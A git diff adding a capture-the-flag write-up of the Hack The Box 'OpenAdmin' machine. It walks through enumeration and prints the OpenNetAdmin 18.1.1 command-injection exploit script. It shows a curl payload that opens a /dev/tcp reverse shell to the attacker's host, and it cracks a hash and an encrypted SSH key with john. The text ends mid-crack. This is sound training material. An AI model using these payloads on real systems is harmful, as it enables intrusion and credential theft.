+ 9aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get a root shell and print the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/41.md b/Easy/41.md
new file mode 100644
index 0000000..f450297
--- /dev/null
+++ b/Easy/41.md
@@ -0,0 +1,756 @@
+# OpenAdmin Writeup
+
+
+
+## Introduction :
+
+OpenAdmin is an easy Linux box released back in january 2020.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.0.14.13/16 ] [ /dev/pts/1 ] [~/HTB]
+ → nmap -sCV 10.10.10.171
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-26 21:20 CEST
+ Nmap scan report for 10.10.10.171
+ Host is up (0.039s latency).
+ Not shown: 998 closed ports
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
+ | 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
+ |_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
+ 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
+ |_http-server-header: Apache/2.4.29 (Ubuntu)
+ |_http-title: Apache2 Ubuntu Default Page: It works
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 9.36 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+For this box we're going to enumerate port 80 using a directory enumeration tool written in go called ffuf with one of the wordlists from seclists:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/13 ] [~/HTB/OpenAdmin]
+ → apt install seclists ffuf
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
+ → ffuf -u http://10.10.10.171/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,307,401 -o ffuf.txt
+
+ /'___\ /'___\ /'___\
+ /\ \__/ /\ \__/ __ __ /\ \__/
+ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
+ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
+ \ \_\ \ \_\ \ \____/ \ \_\
+ \/_/ \/_/ \/___/ \/_/
+
+ v1.3.1 Kali Exclusive
+ ________________________________________________
+
+ :: Method : GET
+ :: URL : http://10.10.10.171/FUZZ
+ :: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
+ :: Output file : ffuf.txt
+ :: File format : json
+ :: Follow redirects : false
+ :: Calibration : false
+ :: Timeout : 10
+ :: Threads : 40
+ :: Matcher : Response status: 200,204,301,302,307,401
+ ________________________________________________
+
+ artwork [Status: 301, Size: 314, Words: 20, Lines: 10]
+ index.html [Status: 200, Size: 10918, Words: 3499, Lines: 376]
+ music [Status: 301, Size: 312, Words: 20, Lines: 10]
+ :: Progress: [4681/4681] :: Job [1/1] :: 978 req/sec :: Duration: [0:00:07] :: Errors: 0 ::
+
+
+
+Now from here we can scrape the results that got outputted in ffuf.txt using a python script:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
+ → cat ffuf.txt
+ {"commandline":"ffuf -u http://10.10.10.171/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,307,401 -o ffuf.txt","time":"2021-05-27T07:01:23+02:00","results":[{"input":{"FUZZ":"artwork"},"position":695,"status":301,"length":314,"words":20,"lines":10,"content-type":"text/html; charset=iso-8859-1","redirectlocation":"http://10.10.10.171/artwork/","resultfile":"","url":"http://10.10.10.171/artwork","host":"10.10.10.171"},{"input":{"FUZZ":"index.html"},"position":2176,"status":200,"length":10918,"words":3499,"lines":376,"content-type":"text/html","redirectlocation":"","resultfile":"","url":"http://10.10.10.171/index.md","host":"10.10.10.171"},{"input":{"FUZZ":"music"},"position":2747,"status":301,"length":312,"words":20,"lines":10,"content-type":"text/html; charset=iso-8859-1","redirectlocation":"http://10.10.10.171/music/","resultfile":"","url":"http://10.10.10.171/music","host":"10.10.10.171"}],"config":{"autocalibration":false,"autocalibration_strings":[],"colors":false,"cmdline":"ffuf -u http://10.10.10.171/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,307,401 -o ffuf.txt","configfile":"","postdata":"","delay":{"value":"0.00"},"dirsearch_compatibility":false,"extensions":[],"filters":{},"follow_redirects":false,"headers":{},"ignorebody":false,"ignore_wordlist_comments":false,"inputmode":"clusterbomb","cmd_inputnum":100,"inputproviders":[{"name":"wordlist","keyword":"FUZZ","value":"/usr/share/seclists/Discovery/Web-Content/common.txt"}],"inputshell":"","matchers":{"status":{"value":"200,204,301,302,307,401"}},"maxtime":0,"maxtime_job":0,"method":"GET","noninteractive":false,"outputdirectory":"","outputfile":"ffuf.txt","outputformat":"json","OutputCreateEmptyFile":false,"proxyurl":"","quiet":false,"rate":0,"recursion":false,"recursion_depth":0,"recursion_strategy":"default","replayproxyurl":"","stop_403":false,"stop_all":false,"stop_errors":false,"threads":40,"timeout":10,"url":"http://10.10.10.171/FUZZ","verbose":false}}%
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
+ → vim scraper.py
+
+
+
+ #!/usr/bin/python
+ import sys
+ import json
+ import requests
+ import argparse
+ from bs4 import BeautifulSoup
+
+ def results(file):
+ content=open(file,'r').readlines()
+ for line in content:
+ data=json.loads(line.strip())
+ urls=[]
+ for url in data['results']:
+ urls.append(url['url'])
+ return urls
+
+ def crawl(url):
+ r = requests.get(url)
+ soup = BeautifulSoup(r.text,'lxml')
+ links = soup.findAll('a',href=True)
+ for link in links:
+ link=link['href']
+ if link and link!='#':
+ print('[+] {} : {} '.format(url,link))
+
+ if __name__ == '__main__' :
+ parser =argparse.ArgumentParser()
+ parser.add_argument("file",help="ffuf results")
+ args = parser.parse_args()
+ urls=results(args.file)
+ for url in urls:
+ crawl(url)
+
+
+
+Now execute it and see the result:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin]
+ → python3 scraper.py
+ usage: scraper.py [-h] file
+ scraper.py: error: the following arguments are required: file
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin]
+ → python3 scraper.py ffuf.txt
+ [+] http://10.10.10.171/artwork : index.html
+ [+] http://10.10.10.171/artwork : index.html
+ [+] http://10.10.10.171/artwork : about.html
+ [+] http://10.10.10.171/artwork : services.html
+ [+] http://10.10.10.171/artwork : blog.html
+ [+] http://10.10.10.171/artwork : contact.html
+ [+] http://10.10.10.171/artwork : single.html
+ [+] http://10.10.10.171/artwork : single.html
+ [+] http://10.10.10.171/artwork : single.html
+ [+] http://10.10.10.171/artwork : single.html
+ [+] http://10.10.10.171/artwork : single.html
+ [+] http://10.10.10.171/artwork : single.html
+ [+] http://10.10.10.171/artwork : index.html
+ [+] http://10.10.10.171/artwork : https://colorlib.com
+ [+] http://10.10.10.171/index.md : /manual
+ [+] http://10.10.10.171/index.md : http://httpd.apache.org/docs/2.4/mod/mod_userdir.html
+ [+] http://10.10.10.171/index.md : https://bugs.launchpad.net/ubuntu/+source/apache2
+ [+] http://10.10.10.171/music : index.html
+
+ [+] http://10.10.10.171/music : ../ona
+
+ [+] http://10.10.10.171/music : index.html
+ [+] http://10.10.10.171/music : category.html
+ [+] http://10.10.10.171/music : playlist.html
+ [+] http://10.10.10.171/music : artist.html
+ [+] http://10.10.10.171/music : blog.html
+ [+] http://10.10.10.171/music : contact.html
+ [+] http://10.10.10.171/music : blog.html
+ [+] http://10.10.10.171/music : contact.html
+ [+] http://10.10.10.171/music : https://colorlib.com
+
+
+
+And so with this we find the ../ona path
+
+
+
+ona in this case refers to OpenNetAdmin, and we know that it is version 18.1.1, so let's see if there are any CVEs for this service:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin]
+ → searchsploit opennetadmin
+ ------------------------------------------------------------ ---------------------------------
+ Exploit Title | Path
+ ------------------------------------------------------------ ---------------------------------
+ OpenNetAdmin 13.03.01 - Remote Code Execution | php/webapps/26682.txt
+ OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)| php/webapps/47772.rb
+ OpenNetAdmin 18.1.1 - Remote Code Execution | php/webapps/47691.sh
+ ------------------------------------------------------------ ---------------------------------
+ Shellcodes: No Results
+
+
+And here you see that we have a few exploits to work with. We're going to take a look at the RCE one:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin]
+ → cp $(locate 47691.sh) .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin]
+ → ls
+ 47691.sh ffuf.txt scraper.py
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin]
+ → vim 47691.sh
+
+ #!/bin/bash
+
+ URL="${1}"
+ while true;do
+ echo -n "$ "; read cmd
+ curl --silent -d "xajax=window_submit&xajaxr;=1574117726710&xajaxargs;[]=tooltips&xajaxargs;[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs;[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
+ done
+
+
+
+Very simplistic exploit, it just needs the URL of the ona instance of the machine:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
+ → dos2unix 47691.sh
+ dos2unix: converting file 47691.sh to Unix format...
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
+ → ./47691.sh http://10.10.10.171/ona/
+ $ id
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+ $ ls -lash
+ total 72K
+ 4.0K drwxrwxr-x 10 www-data www-data 4.0K Nov 22 2019 .
+ 4.0K drwxr-x--- 7 www-data www-data 4.0K Nov 21 2019 ..
+ 4.0K -rw-rw-r-- 1 www-data www-data 2.0K Jan 3 2018 .htaccess.example
+ 4.0K drwxrwxr-x 2 www-data www-data 4.0K Jan 3 2018 config
+ 4.0K -rw-rw-r-- 1 www-data www-data 2.0K Jan 3 2018 config_dnld.php
+ 8.0K -rw-rw-r-- 1 www-data www-data 4.1K Jan 3 2018 dcm.php
+ 4.0K drwxrwxr-x 3 www-data www-data 4.0K Jan 3 2018 images
+ 4.0K drwxrwxr-x 9 www-data www-data 4.0K Jan 3 2018 include
+ 4.0K -rw-rw-r-- 1 www-data www-data 2.0K Jan 3 2018 index.php
+ 4.0K drwxrwxr-x 5 www-data www-data 4.0K Jan 3 2018 local
+ 8.0K -rw-rw-r-- 1 www-data www-data 4.5K Jan 3 2018 login.php
+ 4.0K -rw-rw-r-- 1 www-data www-data 1.1K Jan 3 2018 logout.php
+ 4.0K drwxrwxr-x 3 www-data www-data 4.0K Jan 3 2018 modules
+ 4.0K drwxrwxr-x 3 www-data www-data 4.0K Jan 3 2018 plugins
+ 4.0K drwxrwxr-x 2 www-data www-data 4.0K Jan 3 2018 winc
+ 4.0K drwxrwxr-x 3 www-data www-data 4.0K Jan 3 2018 workspace_plugins
+
+
+And there we have command execution as www-data! However the more we test this, the more we see that we are very limited with our shell (unable to access python3, bash and such) so let's manually push a bash shell:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin]
+ → curl -s -d "xajax=window_submit&xajaxr;=1574117726710&xajaxargs;[]=tooltips&xajaxargs;[]=ip%3D%3E;bash -c 'bash -i >%26 /dev/tcp/10.10.14.13/4443 0>%261'&xajaxargs;[]=ping" http://10.10.10.171/ona/
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
+ → nc -lvnp 4443
+ listening on [any] 4443 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.171] 43106
+ bash: cannot set terminal process group (1077): Inappropriate ioctl for device
+ bash: no job control in this shell
+ www-data@openadmin:/opt/ona/www$ id
+ id
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+
+
+Now let's upgrade our shell to a fully interactive TTY:
+
+
+ www-data@openadmin:/opt/ona/www$ which python python3
+ which python python3
+ /usr/bin/python3
+
+ www-data@openadmin:/opt/ona/www$ python3 -c 'import pty;pty.spawn("/bin/bash")'
+ $ python3 -c 'import pty;pty.spawn("/bin/bash")'
+
+ www-data@openadmin:/opt/ona/www$ ^Z
+ [1] + 3470018 suspended nc -lvnp 4443
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
+ → stty raw -echo ; fg
+ [1] + 3470018 continued nc -lvnp 4443
+ www-data@openadmin:/opt/ona/www$ export TERM=screen-256color
+ www-data@openadmin:/opt/ona/www$ export SHELL=bash
+ www-data@openadmin:/opt/ona/www$ stty rows 40 columns 125
+ www-data@openadmin:/opt/ona/www$ reset
+
+
+Let's see which users we can privesc to:
+
+
+ www-data@openadmin:/opt/ona/www$ cat /etc/passwd | grep bash
+ root:x:0:0:root:/root:/bin/bash
+ jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
+ joanna:x:1001:1001:,,,:/home/joanna:/bin/bash
+ www-data@openadmin:/opt/ona/www$ ls -lashR /home
+ /home:
+ total 16K
+ 4.0K drwxr-xr-x 4 root root 4.0K Nov 22 2019 .
+ 4.0K drwxr-xr-x 24 root root 4.0K Nov 21 2019 ..
+ 4.0K drwxr-x--- 5 jimmy jimmy 4.0K Nov 22 2019 jimmy
+ 4.0K drwxr-x--- 6 joanna joanna 4.0K Nov 28 2019 joanna
+ ls: cannot open directory '/home/jimmy': Permission denied
+ ls: cannot open directory '/home/joanna': Permission denied
+
+
+
+To enumerate this box automatically we can use linpeas.sh:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
+ → locate linpeas.sh
+ /home/nothing/HTB/Postman/linpeas.sh
+ /home/nothing/HTB/Traverxec/linpeas.sh
+ /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
+ → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ www-data@openadmin:/opt/ona/www$ which wget curl
+ /usr/bin/wget
+ /usr/bin/curl
+ www-data@openadmin:/opt/ona/www$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas.sh
+ --2021-05-27 06:39:01-- http://10.10.14.13:9090/linpeas.sh
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 341863 (334K) [text/x-sh]
+ Saving to: '/tmp/peas.sh'
+
+ /tmp/peas.sh 100%[====================================================>] 333.85K 695KB/s in 0.5s
+
+ 2021-05-27 06:39:02 (695 KB/s) - '/tmp/peas.sh' saved [341863/341863]
+
+ www-data@openadmin:/opt/ona/www$ chmod +x /tmp/peas.sh
+ www-data@openadmin:/opt/ona/www$ /tmp/peas.sh
+
+
+
+` 
+
+Linpeas gives alot of output, one thing that stands out is the following:
+
+
+
+OpenNetAdmin has a database settings php file in **/var/www/html/ona/local/config/database_settings.inc.php**
+
+
+ www-data@openadmin:/opt/ona/www$ cd /var/www/html/ona/local/config
+ www-data@openadmin:/var/www/html/ona/local/config$ ls -lash
+ total 16K
+ 4.0K drwxrwxr-x 2 www-data www-data 4.0K Nov 21 2019 .
+ 4.0K drwxrwxr-x 5 www-data www-data 4.0K Jan 3 2018 ..
+ 4.0K -rw-r--r-- 1 www-data www-data 426 Nov 21 2019 database_settings.inc.php
+ 4.0K -rw-rw-r-- 1 www-data www-data 1.2K Jan 3 2018 motd.txt.example
+ 0 -rw-r--r-- 1 www-data www-data 0 Nov 21 2019 run_installer
+ www-data@openadmin:/var/www/html/ona/local/config$ vim database_settings.inc.php
+
+
+
+
+And here we see some hardcoded credentials:
+
+
+ <****?php
+
+ $ona_contexts=array (
+ 'DEFAULT' =>
+ array (
+ 'databases' =>
+ array (
+ 0 =>
+ array (
+ 'db_type' => 'mysqli',
+ 'db_host' => 'localhost',
+ 'db_login' => 'ona_sys',
+ 'db_passwd' => 'n1nj4W4rri0R!',
+ 'db_database' => 'ona_default',
+ 'db_debug' => false,
+ ),
+ ),
+ 'description' => 'Default data context',
+ 'context_color' => '#D3DBFF',
+ ),
+ );
+
+ ?****>
+
+And as it turns out, those were jimmy's credentials!
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/13 ] [~/HTB/OpenAdmin]
+ → ssh jimmy@10.10.10.171
+ The authenticity of host '10.10.10.171 (10.10.10.171)' can't be established.
+ ECDSA key fingerprint is SHA256:loIRDdkV6Zb9r8OMF3jSDMW3MnV5lHgn4wIRq+vmBJY.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.171' (ECDSA) to the list of known hosts.
+ jimmy@10.10.10.171's password:
+ Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ System information as of Thu May 27 07:04:20 UTC 2021
+
+ System load: 0.0 Processes: 121
+ Usage of /: 49.3% of 7.81GB Users logged in: 0
+ Memory usage: 29% IP address for ens160: 10.10.10.171
+ Swap usage: 0%
+
+
+ * Canonical Livepatch is available for installation.
+ - Reduce system reboots and improve kernel security. Activate at:
+ https://ubuntu.com/livepatch
+
+ 41 packages can be updated.
+ 12 updates are security updates.
+
+
+ Last login: Thu Jan 2 20:50:03 2020 from 10.10.14.3
+ jimmy@openadmin:~$ id
+ uid=1000(jimmy) gid=1000(jimmy) groups=1000(jimmy),1002(internal)
+ jimmy@openadmin:~$ ls
+ jimmy@openadmin:~$ ls -lash
+ total 32K
+ 4.0K drwxr-x--- 5 jimmy jimmy 4.0K Nov 22 2019 .
+ 4.0K drwxr-xr-x 4 root root 4.0K Nov 22 2019 ..
+ 0 lrwxrwxrwx 1 jimmy jimmy 9 Nov 21 2019 .bash_history -> /dev/null
+ 4.0K -rw-r--r-- 1 jimmy jimmy 220 Apr 4 2018 .bash_logout
+ 4.0K -rw-r--r-- 1 jimmy jimmy 3.7K Apr 4 2018 .bashrc
+ 4.0K drwx------ 2 jimmy jimmy 4.0K Nov 21 2019 .cache
+ 4.0K drwx------ 3 jimmy jimmy 4.0K Nov 21 2019 .gnupg
+ 4.0K drwxrwxr-x 3 jimmy jimmy 4.0K Nov 22 2019 .local
+ 4.0K -rw-r--r-- 1 jimmy jimmy 807 Apr 4 2018 .profile
+
+
+So now we can access the **/var/www/internal** directory:
+
+
+ jimmy@openadmin:/var/www/internal$ ls -lash
+ total 20K
+ 4.0K drwxrwx--- 2 jimmy internal 4.0K Nov 23 2019 .
+ 4.0K drwxr-xr-x 4 root root 4.0K Nov 22 2019 ..
+ 4.0K -rwxrwxr-x 1 jimmy internal 3.2K Nov 22 2019 index.php
+ 4.0K -rwxrwxr-x 1 jimmy internal 185 Nov 23 2019 logout.php
+ 4.0K -rwxrwxr-x 1 jimmy internal 339 Nov 23 2019 main.php
+ jimmy@openadmin:/var/www/internal$ cat /etc/apache2/sites-enabled/
+ internal.conf openadmin.conf
+ jimmy@openadmin:/var/www/internal$ cat /etc/apache2/sites-enabled/internal.conf
+ Listen 127.0.0.1:52846
+
+
+ ServerName internal.openadmin.htb
+ DocumentRoot /var/www/internal
+
+
+ AssignUserID joanna joanna
+
+
+ ErrorLog ${APACHE_LOG_DIR}/error.log
+ CustomLog ${APACHE_LOG_DIR}/access.log combined
+
+
+
+
+The /var/www/internal/ directory is being used by the apache2 site whose configuration is at /etc/apache2/sites-enabled/internal.conf And it seems to be running on the machine's localhost port **52846** , No need to view the page itself because we have access to it's php sourcecode:
+
+
+ jimmy@openadmin:/var/www/internal$ cat index.php | grep password
+ .form-signin input[type="password"] {
+ if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {
+ if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {
+ $msg = 'Wrong username or password.';
+
+
+So here we get a hashed password, so let's crack it with john:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
+ → cat pass.hashed.txt
+ 00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
+ → hash-identifier
+ #########################################################################
+ # __ __ __ ______ _____ #
+ # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
+ # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
+ # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
+ # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
+ # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
+ # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
+ # By Zion3R #
+ # www.Blackploit.com #
+ # Root@Blackploit.com #
+ #########################################################################
+ --------------------------------------------------
+ HASH: 00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1
+
+ Possible Hashs:
+ [+] SHA-512
+ [+] Whirlpool
+
+ Least Possible Hashs:
+ [+] SHA-512(HMAC)
+ [+] Whirlpool(HMAC)
+ --------------------------------------------------
+
+
+
+We get hinted that this is a SHA512 hash, so let's crack it using john and rockyou.txt
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
+ → john pass.hashed.txt --format=Raw-SHA512 --wordlist=/usr/share/wordlists/rockyou.txt --rules=Jumbo
+ Using default input encoding: UTF-8
+ Loaded 1 password hash (Raw-SHA512 [SHA512 256/256 AVX2 4x])
+ Warning: poor OpenMP scalability for this hash type, consider --fork=4
+ Will run 4 OpenMP threads
+ Press 'q' or Ctrl-C to abort, almost any other key for status
+
+ Revealed (?)
+
+ 1g 0:00:00:02 DONE (2021-05-27 09:06) 0.4504g/s 6963Kp/s 6963Kc/s 6963KC/s Rey428..Reesenme
+ Use the "--show" option to display all of the cracked passwords reliably
+ Session completed
+
+
+
+And we get the password 'Revealed'! So let's create a ssh tunnel to the box to view the internal website:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin]
+ → ssh jimmy@10.10.10.171
+ jimmy@10.10.10.171's password: n1nj4W4rri0R!
+ Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ System information as of Thu May 27 08:16:54 UTC 2021
+
+ System load: 0.0 Processes: 118
+ Usage of /: 49.3% of 7.81GB Users logged in: 1
+ Memory usage: 29% IP address for ens160: 10.10.10.171
+ Swap usage: 0%
+
+
+ * Canonical Livepatch is available for installation.
+ - Reduce system reboots and improve kernel security. Activate at:
+ https://ubuntu.com/livepatch
+
+ 41 packages can be updated.
+ 12 updates are security updates.
+
+ Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
+
+
+ Last login: Thu May 27 07:04:21 2021 from 10.10.14.13
+ jimmy@openadmin:~$
+
+
+Here you could create a SSH tunnel to get to the internal website like so:
+
+
+ jimmy@openadmin:~$ ssh -R 1337:127.0.0.1:52946 root@10.10.14.13
+
+
+
+However there's a simpler method:
+
+
+ jimmy@openadmin:/var/www/internal$ curl localhost:52846/main.php
+
+
+
+ -----BEGIN RSA PRIVATE KEY-----
+ Proc-Type: 4,ENCRYPTED
+ DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D
+
+ kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
+ ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
+ ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
+ 6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
+ ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
+ y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
+ 9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
+ piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
+ /U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
+ 40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
+ fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
+ 9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
+ X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
+ S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
+ FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
+ Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
+ RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
+ uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
+ 1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
+ XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
+ yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+ +4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
+ qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
+ z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
+ K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
+ -----END RSA PRIVATE KEY-----
+
+
+### Don't forget your "ninja" password
+
+Click here to logout [Session](logout.php)
+
+And we have an encrypted ssh key! so let's crack it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin]
+ → vim id_rsa
+
+ [ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin]
+ → file id_rsa
+ id_rsa: PEM RSA private key
+
+ [ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin]
+ → locate ssh2john
+ /usr/share/john/ssh2john.py
+
+ [ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin]
+ → /usr/share/john/ssh2john.py id_rsa > id_rsa.hash
+
+ [ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin]
+ → john id_rsa.hash -w=/usr/share/wordlists/rockyou.txt
+ Using default input encoding: UTF-8
+ Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
+ Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
+ Cost 2 (iteration count) is 1 for all loaded hashes
+ Will run 4 OpenMP threads
+ Note: This format may emit false positives, so it will keep trying even after
+ finding a possible candidate.
+ Press 'q' or Ctrl-C to abort, almost any other key for status
+ bloodninjas (id_rsa)
+ Warning: Only 2 candidates left, minimum 4 needed for performance.
